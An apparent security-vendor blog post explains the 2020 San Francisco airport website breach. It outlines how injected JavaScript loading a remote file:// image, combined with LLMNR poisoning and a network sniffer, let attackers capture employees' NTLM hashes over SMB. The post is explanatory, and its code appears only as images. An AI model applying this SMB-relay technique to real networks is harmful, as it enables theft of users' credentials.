Breaking down the San Francisco airport hack

Blog | 06-05-2020 | 2 Minute read

Breaking down the San Francisco airport hack

On April 7, 2020, the San Francisco International Airport (SFO) released a notice confirming that two of its websites, and, were targets of a cyberattack in March 2020. The attack has been attributed to a hacker group that was attempting to steal the Windows logins of the airport’s employees.

When we hear news about cyberattacks, a few typical, yet crucial questions spring to mind: How did the attackers perform the cyberattack? Why did the airport authorities take so long to discover the breach? Could the breach have been prevented? And most importantly, am I at risk too?

The attack involved the use of the Server Message Block (SMB) protocol, a client-server communication protocol used for sharing access to files, printers, and serial ports in a network. In order to acquire a deeper understanding and examine the possible reasons behind the breach, we took up the mammoth task of simulating the breach on our end.


After hacking the SFO employee sites, attackers injected a small piece of JavaScript code on the website.

Breaking down the San Francisco airport hack 1

If you observe the highlighted region in the image above, you will notice that the src (source) points to an image on a remote system (file:// As you have probably already realized, the code inserts an image into the website’s HTML.


We now need to set up the attacker’s system, or the remote system from which the code is trying to fetch the image from. The system can be a non-domain system too.

A network sniffer, a tool that captures any request coming from other hosts, must be installed next.

Breaking down the San Francisco airport hack 2

The above image is a publicly available PowerShell script that poisons all Link-Local Multicast Name Resolution (LLMNR) requests.

We will examine LLMNR in detail in future blog posts, but for now, all you need to know is that LLMNR is like a backup DNS server used for resolving hostnames when the DNS fails to find a hostname. Below is a visual representation of the attack.

Breaking down the San Francisco airport hack 3

The above is an example of an SMB-relay attack.


  • \\Serv1 in the above representation is the PNG file injected into the website.
  • The victim user’s browser attempts to locate the image using its UNC path FILE:// from the attacker’s system using the SMB protocol.
  • Thanks to the network sniffer, attackers are now able to retrieve the NTLM hashes of the victim.

Breaking down the San Francisco airport hack 4

The prospect of being on the receiving end of one of these attacks is scary, but there are ways to prevent them.

NOTE: The attack outlined above is a similar concept to the San Francisco International Airport breach, but the actual tools used and the attack method may vary.

Related Solutions

Subscribe for the latest resources

To receive our latest resources via email, please complete your details below.
  • By subscribing, I agree that my data may be used according to the terms and condition of this website.
  • *Please note that in each email you receive you can at any time revoke your consent by unsubscribing. Simply click on the unsubscribe button/link and you will no longer receive product information, updates, and upcoming events from and about ITR Technology. This also guarantees permanent removal of your email address from our mailing lists.
  • Hidden
  • Hidden
  • Hidden
  • This field is for validation purposes and should be left unchanged.